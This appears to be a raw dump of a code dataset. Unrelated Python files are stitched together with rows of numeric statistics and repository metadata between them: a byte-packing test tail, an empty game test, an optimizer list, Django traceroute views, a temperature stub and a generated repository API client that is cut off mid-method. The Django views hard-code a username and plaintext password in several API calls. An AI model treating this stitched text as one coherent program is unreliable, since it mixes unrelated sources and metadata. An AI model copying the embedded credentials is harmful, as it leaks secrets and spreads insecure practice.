\x1c\x01\x1d\x01\x1e\x01\x1f\x01 \x01!\x01"\x01#\x01$\x01%\x01&\x01\'\x01(\x01)\x01*\x01+\x01,\x01-\x01.\x01/\x010\x011\x012\x013\x014\x015\x016\x017\x018\x019\x01:\x01;\x01<\x01=\x01>\x01?\x01@\x01A\x01B\x01C\x01D\x01E\x01F\x01G\x01H\x01I\x01J\x01K\x01L\x01M\x01N\x01O\x01P\x01Q\x01R\x01S\x01T\x01U\x01V\x01W\x01X\x01Y\x01Z\x01[\x01\\\x01]\x01^\x01_\x01`\x01a\x01b\x01c\x01d\x01e\x01f\x01g\x01h\x01i\x01j\x01k\x01l\x01m\x01n\x01o\x01p\x01q\x01r\x01s\x01t\x01u\x01v\x01w\x01x\x01y\x01z\x01{\x01|\x01}\x01~\x01\x7f\x01\x80\x01\x81\x01\x82\x01\x83\x01\x84\x01\x85\x01\x86\x01\x87\x01\x88\x01\x89\x01\x8a\x01\x8b\x01\x8c\x01\x8d\x01\x8e\x01\x8f\x01\x90\x01\x91\x01\x92\x01\x93\x01\x94\x01\x95\x01\x96\x01\x97\x01\x98\x01\x99\x01\x9a\x01\x9b\x01\x9c\x01\x9d\x01\x9e\x01\x9f\x01\xa0\x01\xa1\x01\xa2\x01\xa3\x01\xa4\x01\xa5\x01\xa6\x01\xa7\x01\xa8\x01\xa9\x01\xaa\x01\xab\x01\xac\x01\xad\x01\xae\x01\xaf\x01\xb0\x01\xb1\x01\xb2\x01\xb3\x01\xb4\x01\xb5\x01\xb6\x01\xb7\x01\xb8\x01\xb9\x01\xba\x01\xbb\x01\xbc\x01\xbd\x01\xbe\x01\xbf\x01\xc0\x01\xc1\x01\xc2\x01\xc3\x01\xc4\x01\xc5\x01\xc6\x01\xc7\x01\xc8\x01\xc9\x01\xca\x01\xcb\x01\xcc\x01\xcd\x01\xce\x01\xcf\x01\xd0\x01\xd1\x01\xd2\x01\xd3\x01\xd4\x01\xd5\x01\xd6\x01\xd7\x01\xd8\x01\xd9\x01\xda\x01\xdb\x01\xdc\x01\xdd\x01\xde\x01\xdf\x01\xe0\x01\xe1\x01\xe2\x01\xe3\x01\xe4\x01\xe5\x01\xe6\x01\xe7\x01\xe8\x01\xe9\x01\xea\x01\xeb\x01\xec\x01\xed\x01\xee\x01\xef\x01\xf0\x01\xf1\x01\xf2\x01\xf3\x01\xf4\x01\xf5\x01\xf6\x01\xf7\x01\xf8\x01\xf9\x01\xfa\x01\xfb\x01\xfc\x01\xfd\x01\xfe\x01\xff\x01'
unicodestring = ''.join( [chr_(i) for i in range(0x200)])
self.assertEqual(result, upack2(unicodestring))
def test_upack2rt(self):
# upack2rt returns a pair: the packed string bytes and the rich-text run bytes.
result = b'\x06\x00\x09\x01\x00a\x00b\x00c\x00\x91\x03\x92\x03\x93\x03', b'\x00\x00\x0C\x00'
self.assertEqual(result, upack2rt([(u'abcΑΒΓ', 12)]))
| 129.736842
| 3,550
| 0.726978
| 1,006
| 4,930
| 3.548708
| 0.280318
| 0.055462
| 0.068067
| 0.07395
| 0.30084
| 0.289076
| 0.267227
| 0.254902
| 0.254902
| 0.22521
| 0
| 0.313961
| 0.054158
| 4,930
| 37
| 3,551
| 133.243243
| 0.451641
| 0.002434
| 0
| 0.214286
| 0
| 0.107143
| 0.444264
| 0.437144
| 0
| 1
| 0.001017
| 0
| 0.214286
| 1
| 0.214286
| false
| 0
| 0.107143
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
297f81e0a5ce5ff74ab6d3164d24f781a7df2e8f
| 200
|
py
|
Python
|
test/test_fuzzy_game.py
|
xfuzzycomp/FuzzyAsteroids
|
636707499b4689bdecd8af32231c3ffd43f6583b
|
[
"MIT"
] | 1
|
2021-09-14T20:38:08.000Z
|
2021-09-14T20:38:08.000Z
|
test/test_fuzzy_game.py
|
xfuzzycomp/FuzzyAsteroids
|
636707499b4689bdecd8af32231c3ffd43f6583b
|
[
"MIT"
] | null | null | null |
test/test_fuzzy_game.py
|
xfuzzycomp/FuzzyAsteroids
|
636707499b4689bdecd8af32231c3ffd43f6583b
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from src.fuzzy_asteroids.fuzzy_controller import *
from src.fuzzy_asteroids.fuzzy_asteroids import FuzzyAsteroidGame, Scenario
class TestFuzzyGame(TestCase):
    """Placeholder suite for the fuzzy asteroid game; no test cases defined yet."""
| 22.222222
| 75
| 0.84
| 24
| 200
| 6.833333
| 0.541667
| 0.256098
| 0.146341
| 0.256098
| 0.317073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115
| 200
| 8
| 76
| 25
| 0.926554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
468377cd18e71597a5421f1a0ebc1f1bd2581277
| 1,023
|
py
|
Python
|
tests/test_optimizers/_parametrize.py
|
PartiallyTyped/Hyperactive
|
99d4f6416cf724d5dbe797c2a1a1f9ae22e7d482
|
[
"MIT"
] | 382
|
2019-07-16T13:30:15.000Z
|
2022-03-30T22:29:07.000Z
|
tests/test_optimizers/_parametrize.py
|
PartiallyTyped/Hyperactive
|
99d4f6416cf724d5dbe797c2a1a1f9ae22e7d482
|
[
"MIT"
] | 46
|
2019-08-27T18:07:47.000Z
|
2022-03-16T16:28:10.000Z
|
tests/test_optimizers/_parametrize.py
|
PartiallyTyped/Hyperactive
|
99d4f6416cf724d5dbe797c2a1a1f9ae22e7d482
|
[
"MIT"
] | 35
|
2019-08-03T00:51:09.000Z
|
2021-12-03T19:06:07.000Z
|
from hyperactive import (
HillClimbingOptimizer,
StochasticHillClimbingOptimizer,
RepulsingHillClimbingOptimizer,
RandomSearchOptimizer,
RandomRestartHillClimbingOptimizer,
RandomAnnealingOptimizer,
SimulatedAnnealingOptimizer,
ParallelTemperingOptimizer,
ParticleSwarmOptimizer,
EvolutionStrategyOptimizer,
BayesianOptimizer,
TreeStructuredParzenEstimators,
DecisionTreeOptimizer,
EnsembleOptimizer,
)
# Parametrization spec shared by the optimizer test modules:
# (pytest argument name, list of optimizer classes to exercise).
optimizers = (
    "Optimizer",
    [
        HillClimbingOptimizer,
        StochasticHillClimbingOptimizer,
        RepulsingHillClimbingOptimizer,
        RandomSearchOptimizer,
        RandomRestartHillClimbingOptimizer,
        RandomAnnealingOptimizer,
        SimulatedAnnealingOptimizer,
        ParallelTemperingOptimizer,
        ParticleSwarmOptimizer,
        EvolutionStrategyOptimizer,
        BayesianOptimizer,
        TreeStructuredParzenEstimators,
        DecisionTreeOptimizer,
        EnsembleOptimizer,
    ],
)
| 26.921053
| 45
| 0.717498
| 33
| 1,023
| 22.242424
| 0.575758
| 0.141689
| 0.223433
| 0.280654
| 0.945504
| 0.945504
| 0.945504
| 0.945504
| 0.945504
| 0.945504
| 0
| 0
| 0.217009
| 1,023
| 37
| 46
| 27.648649
| 0.916355
| 0
| 0
| 0
| 0
| 0
| 0.008798
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.028571
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
46934f93a99993a4a8a8ae8f292421d6f3837197
| 10,645
|
py
|
Python
|
bootcamp/traceroute/views.py
|
davismathew/netbot-django
|
5a46368ba7c16790e1b96292eecfde6f8f35d2e5
|
[
"MIT"
] | null | null | null |
bootcamp/traceroute/views.py
|
davismathew/netbot-django
|
5a46368ba7c16790e1b96292eecfde6f8f35d2e5
|
[
"MIT"
] | null | null | null |
bootcamp/traceroute/views.py
|
davismathew/netbot-django
|
5a46368ba7c16790e1b96292eecfde6f8f35d2e5
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponseBadRequest, HttpResponse
from bootcamp.tasks.models import Task
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from bootcamp.tasks.forms import TaskForm
from django.contrib.auth.decorators import login_required
from bootcamp.decorators import ajax_required
import markdown
from django.template.loader import render_to_string
import requests,json
from bootcamp.utils.loadconfig import get_vars
def getvrflist(network):
    """Return the list of VRF names for *network* ('emc' or 'mtn').

    Each entry is a raw line from the VRF list file (trailing newline
    included, matching the original behaviour relied on by the templates).

    Raises:
        ValueError: if *network* is neither 'emc' nor 'mtn'.  The original
            code left ``filename`` unbound in that case and crashed with an
            UnboundLocalError at the ``open()`` call.
    """
    network = network.lower()
    if network == 'emc':
        filename = '/etc/netbot/emcvrflist.txt'
    elif network == 'mtn':
        filename = '/etc/netbot/mtnvrflist.txt'
    else:
        raise ValueError("unknown network: %r" % network)
    with open(filename) as f:
        return [line for line in f]
@login_required
def traceroute(request):
    """Render the traceroute input form, pre-populated with the EMC VRF list."""
    vrf_choices = getvrflist('emc')
    context = {'task': "task", 'emcvrf': vrf_choices, 'message': ""}
    return render(request, 'traceroute/traceroute.html', context)
@login_required
def inttraceroute(request):
    """Render the interface-traceroute input form with the EMC VRF list."""
    vrf_choices = getvrflist('emc')
    context = {'task': "task", 'emcvrf': vrf_choices, 'message': ""}
    return render(request, 'traceroute/inttraceroute.html', context)
@login_required()
def runtrace(request):
    """Validate the traceroute form and render the run page.

    Fixes over the original:
    - the initial ``baseurl = get_vars('ansibengineemc')`` was dead code
      (unconditionally overwritten by the network check below);
    - validation now also rejects *missing* POST keys (``request.POST.get``
      returns ``None``, which the old ``== ''`` comparison let through);
    - the four-line vrf normalisation is a single conditional expression.
    """
    sourceip = request.POST.get('sourceip')
    destip = request.POST.get('destip')
    vrf = request.POST.get('vrf')
    network = request.POST.get('network')
    vrfname = request.POST.get('vrfname')
    emcvrfname = getvrflist('emc')
    # Reject empty OR missing fields before doing any work.
    if not all([sourceip, destip, vrf, vrfname, network]):
        return render(request, 'traceroute/traceroute.html',
                      {'task': "task", 'emcvrf': emcvrfname,
                       'message': "Please fill in all the details!!"})
    # Pick the Ansible engine endpoint for the selected network.
    if str(network).lower() == 'emc':
        baseurl = get_vars('ansibengineemc')
    else:
        baseurl = get_vars('ansibenginemtn')
    # Normalise the checkbox value to the literal strings the template expects.
    vrf = "True" if vrf == 'True' else "False"
    return render(request, 'traceroute/runtraceroute.html',
                  {'sourceip': sourceip, 'destip': destip,
                   'vrfname': vrfname, 'vrf': vrf, 'baseurl': baseurl})
@login_required()
def runtraceapi(request):
    """Proxy a traceroute job to the Ansible engine REST API.

    Returns the engine's JSON response verbatim, or a JSON error object
    when the engine is unreachable or replies with an unexpected status.
    """
    baseurl = request.POST.get('baseurl')
    url = baseurl + '/ansibengine/api/v1.0/runtrace'
    headers = {'content-type': 'application/json'}
    payload = {
        'sourceip': request.POST.get('sourceip'),
        'destip': request.POST.get('destip'),
        'vrfname': request.POST.get('vrfname'),
        'vrf': "True" if request.POST.get('vrf') == 'True' else "False",
    }
    error = {}
    try:
        # NOTE(review): credentials are hard-coded here and in the sibling
        # views — consider moving them into configuration.
        response = requests.post(url, data=json.dumps(payload),
                                 headers=headers, auth=('netbot', 'N#tB@t'))
        if not response.status_code == 201:
            error['value'] = "Error!! Unexpected response. Please report this"
            return HttpResponse(json.dumps(error), content_type="application/json")
    except requests.exceptions.RequestException:
        error['value'] = "Error connecting to API. Please report this"
        return HttpResponse(json.dumps(error), content_type="application/json")
    return HttpResponse(response.text, content_type="application/json")
@login_required()
def runinterfacetrace(request):
    """Validate the interface-traceroute form and render the run page.

    Fixes over the original:
    - the initial ``baseurl = get_vars('ansibengineemc')`` was dead code
      (unconditionally overwritten by the network check below);
    - validation now also rejects *missing* POST keys (``request.POST.get``
      returns ``None``, which the old ``== ''`` comparison let through);
    - the four-line vrf normalisation is a single conditional expression.
    """
    routerip = request.POST.get('sourceip')
    interfaceip = request.POST.get('sourceint')
    destip = request.POST.get('destip')
    vrf = request.POST.get('vrf')
    network = request.POST.get('network')
    vrfname = request.POST.get('vrfdropdown')
    emcvrfname = getvrflist('emc')
    # Reject empty OR missing fields before doing any work.
    if not all([routerip, interfaceip, destip, vrf, vrfname, network]):
        return render(request, 'traceroute/inttraceroute.html',
                      {'task': "task", 'emcvrf': emcvrfname,
                       'message': "Please fill in all the details!!"})
    # Pick the Ansible engine endpoint for the selected network.
    if str(network).lower() == 'emc':
        baseurl = get_vars('ansibengineemc')
    else:
        baseurl = get_vars('ansibenginemtn')
    # Normalise the checkbox value to the literal strings the template expects.
    vrf = "True" if vrf == 'True' else "False"
    return render(request, 'traceroute/runinterfacetraceroute.html',
                  {'routerip': routerip, 'interfaceip': interfaceip,
                   'destip': destip, 'vrfname': vrfname, 'vrf': vrf,
                   'baseurl': baseurl})
@login_required()
def runinterfacetraceapi(request):
    """Proxy an interface-traceroute job to the Ansible engine REST API.

    Returns the engine's JSON response verbatim, or a JSON error object
    when the engine is unreachable or replies with an unexpected status.
    """
    baseurl = request.POST.get('baseurl')
    url = baseurl + '/ansibengine/api/v1.0/runinterfacetrace'
    headers = {'content-type': 'application/json'}
    payload = {
        'routerip': request.POST.get('routerip'),
        'interfaceip': request.POST.get('interfaceip'),
        'destip': request.POST.get('destip'),
        'vrfname': request.POST.get('vrfname'),
        'vrf': "True" if request.POST.get('vrf') == 'True' else "False",
    }
    error = {}
    try:
        # NOTE(review): credentials are hard-coded here and in the sibling
        # views — consider moving them into configuration.
        response = requests.post(url, data=json.dumps(payload),
                                 headers=headers, auth=('netbot', 'N#tB@t'))
        if not response.status_code == 201:
            error['value'] = "Error!! Unexpected response. Please report this"
            return HttpResponse(json.dumps(error), content_type="application/json")
    except requests.exceptions.RequestException:
        error['value'] = "Error connecting to API. Please report this"
        return HttpResponse(json.dumps(error), content_type="application/json")
    return HttpResponse(response.text, content_type="application/json")
##deprecated method
@login_required()
def gettraceroute(request):
    """Deprecated: kick off a traceroute job on the Ansible engine.

    Bug fixed: the original guard was ``if vrf is True:`` but ``vrf`` comes
    from ``request.POST`` and is therefore always a string (or None), so the
    VRF branch was unreachable.  The comparison now matches the string
    convention used by the other views (``vrf == 'True'``), which also lets
    the two duplicated request branches collapse into one.
    """
    sourceip = request.POST.get('sourceip')
    destip = request.POST.get('destip')
    vrf = request.POST.get('vrf')
    network = request.POST.get('network')
    vrfname = request.POST.get('vrfdropdown')
    # Pick the Ansible engine endpoint for the selected network.
    if str(network).lower() == 'emc':
        baseurl = get_vars('ansibengineemc')
    else:
        baseurl = get_vars('ansibenginemtn')
    url = baseurl + '/ansibengine/api/v1.0/gettraceroute'
    headers = {'content-type': 'application/json'}
    emcvrfname = getvrflist('emc')
    data = {
        'sourceip': sourceip,
        'destip': destip,
        'vrf': "True" if vrf == 'True' else "False",
        'vrfname': vrfname,
    }
    response = requests.post(url, data=json.dumps(data), headers=headers,
                             auth=('netbot', 'N#tB@t'))
    # HTTP 200 from the engine means another job is already in progress.
    if int(response.status_code) == 200:
        return render(request, 'traceroute/traceroute.html',
                      {'task': "task", 'emcvrf': emcvrfname,
                       'message': "Another task is running! Please wait.."})
    return render(request, 'traceroute/runtraceroute.html',
                  {'task': "task", 'baseurl': baseurl})
##deprecated method
@login_required()
def getinterfacetraceroute(request):
    """Deprecated: kick off an interface-traceroute job on the Ansible engine.

    Bugs fixed: ``if vrf is True:`` was always False because POST values are
    strings, leaving the VRF branch unreachable — now ``vrf == 'True'`` like
    the sibling views, which lets the duplicated branches collapse.  Also
    ``network.lower()`` raised AttributeError when the key was missing
    (``None``); ``str(network).lower()`` matches the other views.
    """
    routerip = request.POST.get('sourceip')
    interfaceip = request.POST.get('sourceint')
    destip = request.POST.get('destip')
    vrf = request.POST.get('vrf')
    network = request.POST.get('network')
    vrfname = request.POST.get('vrfdropdown')
    # Pick the Ansible engine endpoint for the selected network.
    if str(network).lower() == 'emc':
        baseurl = get_vars('ansibengineemc')
    else:
        baseurl = get_vars('ansibenginemtn')
    url = baseurl + '/ansibengine/api/v1.0/getinterfacetraceroute'
    headers = {'content-type': 'application/json'}
    emcvrfname = getvrflist('emc')
    data = {
        'routerip': routerip,
        'interfaceip': interfaceip,
        'destip': destip,
        'vrf': "True" if vrf == 'True' else "False",
        'vrfname': vrfname,
    }
    response = requests.post(url, data=json.dumps(data), headers=headers,
                             auth=('netbot', 'N#tB@t'))
    # HTTP 200 from the engine means another job is already in progress.
    if int(response.status_code) == 200:
        return render(request, 'traceroute/inttraceroute.html',
                      {'task': "task", 'emcvrf': emcvrfname,
                       'message': "Another task is running! Please wait.."})
    return render(request, 'traceroute/runinterfacetraceroute.html',
                  {'task': "task", 'baseurl': baseurl})
##deprecated method
def runtraceroute(request):
    """Deprecated: fire a fixed-payload runtraceroute call at the engine."""
    baseurl = get_vars('ansibengineemc')
    if request.method == 'POST':
        baseurl = request.POST.get('baseurl')
    url = baseurl + '/ansibengine/api/v1.0/runtraceroute'
    headers = {'content-type': 'application/json'}
    payload = {'value': "some", 'ipath': 'new value'}
    response = requests.post(url, data=json.dumps(payload), headers=headers,
                             auth=('netbot', 'N#tB@t'))
    return HttpResponse(response.text, content_type="application/json")
##deprecated method
def runinterfacetraceroute(request):
    """Deprecated: fire a runinterfacetraceroute call at the engine."""
    baseurl = get_vars('ansibengineemc')
    if request.method == 'POST':
        baseurl = request.POST.get('baseurl')
    url = baseurl + '/ansibengine/api/v1.0/runinterfacetraceroute'
    headers = {'content-type': 'application/json'}
    payload = {'value': url}
    response = requests.post(url, data=json.dumps(payload), headers=headers,
                             auth=('netbot', 'N#tB@t'))
    return HttpResponse(response.text, content_type="application/json")
| 36.084746
| 184
| 0.654486
| 1,200
| 10,645
| 5.761667
| 0.120833
| 0.058866
| 0.07492
| 0.052647
| 0.84799
| 0.835985
| 0.825571
| 0.815158
| 0.76497
| 0.750217
| 0
| 0.004858
| 0.187788
| 10,645
| 294
| 185
| 36.207483
| 0.794818
| 0.046407
| 0
| 0.761261
| 0
| 0
| 0.244201
| 0.062481
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04955
| false
| 0
| 0.04955
| 0
| 0.193694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46a8106832fc86d96aa0c267b77a51219ca8aa64
| 131
|
py
|
Python
|
src/detect-abnormal-temps/enviroment_temperature.py
|
latonaio/detect-abnormal-set-of-temperatures
|
e5cda1156e23f77f0feb16b56e3624807592fafb
|
[
"MIT"
] | 8
|
2021-10-02T02:50:34.000Z
|
2021-11-05T04:34:38.000Z
|
src/detect-abnormal-temps/enviroment_temperature.py
|
latonaio/detect-abnormal-set-of-temperatures
|
e5cda1156e23f77f0feb16b56e3624807592fafb
|
[
"MIT"
] | null | null | null |
src/detect-abnormal-temps/enviroment_temperature.py
|
latonaio/detect-abnormal-set-of-temperatures
|
e5cda1156e23f77f0feb16b56e3624807592fafb
|
[
"MIT"
] | null | null | null |
import random
def get_enviromental_temperature():
    """Return the ambient temperature reading (stub).

    FIXME: read the real value from the sensor; until then a random
    integer in the inclusive range [20, 25] is returned.
    """
    return random.randint(20, 25)
| 16.375
| 39
| 0.717557
| 16
| 131
| 5.75
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038835
| 0.21374
| 131
| 7
| 40
| 18.714286
| 0.854369
| 0.259542
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
314bae4978630cb75a5b15193e2c56fa0874eaf8
| 38,821
|
py
|
Python
|
lockss_repository/api/collections_api.py
|
lockss/lockss-repository-python
|
3e28121f9beed27d43af57f66b3dc9c339b274d8
|
[
"BSD-3-Clause"
] | null | null | null |
lockss_repository/api/collections_api.py
|
lockss/lockss-repository-python
|
3e28121f9beed27d43af57f66b3dc9c339b274d8
|
[
"BSD-3-Clause"
] | null | null | null |
lockss_repository/api/collections_api.py
|
lockss/lockss-repository-python
|
3e28121f9beed27d43af57f66b3dc9c339b274d8
|
[
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
"""
LOCKSS Repository Service REST API
API of the LOCKSS RepositoryService for the LAAWS project # noqa: E501
OpenAPI spec version: 1.9
Contact: dlvargas@stanford.edu
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from lockss_repository.api_client import ApiClient
class CollectionsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    # Fall back to a freshly constructed default client when the caller
    # does not supply one.
    self.api_client = api_client if api_client is not None else ApiClient()
def collections_collectionid_artifacts_artifactid_delete(self, collectionid, artifactid, **kwargs):  # noqa: E501
    """Remove an artifact from the repository  # noqa: E501

    Synchronous by default; pass async=True to get the request thread
    instead (call ``thread.get()`` for the result).

    :param async bool
    :param str collectionid: Collection containing the artifact (required)
    :param str artifactid: Identifier of the artifact (required)
    :return: None, or the request thread when called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the same implementation;
    # the async flag is simply forwarded through **kwargs.
    impl = self.collections_collectionid_artifacts_artifactid_delete_with_http_info
    return impl(collectionid, artifactid, **kwargs)  # noqa: E501
def collections_collectionid_artifacts_artifactid_delete_with_http_info(self, collectionid, artifactid, **kwargs):  # noqa: E501
    """Remove an artifact from the repository  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.collections_collectionid_artifacts_artifactid_delete_with_http_info(collectionid, artifactid, async=True)
    >>> result = thread.get()

    :param async bool
    :param str collectionid: Collection containing the artifact (required)
    :param str artifactid: Identifier of the artifact (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['collectionid', 'artifactid']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method collections_collectionid_artifacts_artifactid_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'collectionid' is set
    if ('collectionid' not in params or
            params['collectionid'] is None):
        raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_artifacts_artifactid_delete`")  # noqa: E501
    # verify the required parameter 'artifactid' is set
    if ('artifactid' not in params or
            params['artifactid'] is None):
        raise ValueError("Missing the required parameter `artifactid` when calling `collections_collectionid_artifacts_artifactid_delete`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'collectionid' in params:
        path_params['collectionid'] = params['collectionid']  # noqa: E501
    if 'artifactid' in params:
        path_params['artifactid'] = params['artifactid']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # BUGFIX: `async` became a reserved keyword in Python 3.7, so the
    # generated `async=params.get('async')` keyword argument is a
    # SyntaxError on modern interpreters.  Passing it via dict unpacking
    # preserves the exact call contract while staying parseable.
    return self.api_client.call_api(
        '/collections/{collectionid}/artifacts/{artifactid}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def collections_collectionid_artifacts_artifactid_get(self, collectionid, artifactid, **kwargs):  # noqa: E501
    """Get artifact content and metadata  # noqa: E501

    Synchronous by default; pass async=True to get the request thread
    instead (call ``thread.get()`` for the result).

    :param async bool
    :param str collectionid: Collection containing the artifact (required)
    :param str artifactid: Identifier of the artifact (required)
    :param str accept: Content type to return
    :return: StreamingResponseBody, or the request thread when called
        asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the same implementation;
    # the async flag is simply forwarded through **kwargs.
    impl = self.collections_collectionid_artifacts_artifactid_get_with_http_info
    return impl(collectionid, artifactid, **kwargs)  # noqa: E501
def collections_collectionid_artifacts_artifactid_get_with_http_info(self, collectionid, artifactid, **kwargs):  # noqa: E501
    """Get artifact content and metadata  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.collections_collectionid_artifacts_artifactid_get_with_http_info(collectionid, artifactid, async=True)
    >>> result = thread.get()

    :param async bool
    :param str collectionid: Collection containing the artifact (required)
    :param str artifactid: Identifier of the artifact (required)
    :param str accept: Content type to return
    :return: StreamingResponseBody
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['collectionid', 'artifactid', 'accept']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method collections_collectionid_artifacts_artifactid_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'collectionid' is set
    if ('collectionid' not in params or
            params['collectionid'] is None):
        raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_artifacts_artifactid_get`")  # noqa: E501
    # verify the required parameter 'artifactid' is set
    if ('artifactid' not in params or
            params['artifactid'] is None):
        raise ValueError("Missing the required parameter `artifactid` when calling `collections_collectionid_artifacts_artifactid_get`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'collectionid' in params:
        path_params['collectionid'] = params['collectionid']  # noqa: E501
    if 'artifactid' in params:
        path_params['artifactid'] = params['artifactid']  # noqa: E501
    query_params = []
    header_params = {}
    if 'accept' in params:
        header_params['Accept'] = params['accept']  # noqa: E501
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept` (overrides any caller-supplied value above,
    # matching the generated behaviour)
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # BUGFIX: `async` became a reserved keyword in Python 3.7, so the
    # generated `async=params.get('async')` keyword argument is a
    # SyntaxError on modern interpreters.  Passing it via dict unpacking
    # preserves the exact call contract while staying parseable.
    return self.api_client.call_api(
        '/collections/{collectionid}/artifacts/{artifactid}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='StreamingResponseBody',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def collections_collectionid_artifacts_artifactid_put(self, collectionid, artifactid, **kwargs):  # noqa: E501
    """Update the committed property of an artifact  # noqa: E501

    Synchronous by default; pass async=True to get the request thread
    instead (call ``thread.get()`` for the result).

    :param async bool
    :param str collectionid: Collection containing the artifact (required)
    :param str artifactid: Identifier of the artifact (required)
    :param bool committed: New commit status of artifact
    :return: Artifact, or the request thread when called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the same implementation;
    # the async flag is simply forwarded through **kwargs.
    impl = self.collections_collectionid_artifacts_artifactid_put_with_http_info
    return impl(collectionid, artifactid, **kwargs)  # noqa: E501
def collections_collectionid_artifacts_artifactid_put_with_http_info(self, collectionid, artifactid, **kwargs):  # noqa: E501
    """Update the committed property of an artifact  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.collections_collectionid_artifacts_artifactid_put_with_http_info(collectionid, artifactid, async=True)
    >>> result = thread.get()

    :param async bool
    :param str collectionid: Collection containing the artifact (required)
    :param str artifactid: Identifier of the artifact (required)
    :param bool committed: New commit status of artifact
    :return: Artifact
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['collectionid', 'artifactid', 'committed']  # noqa: E501
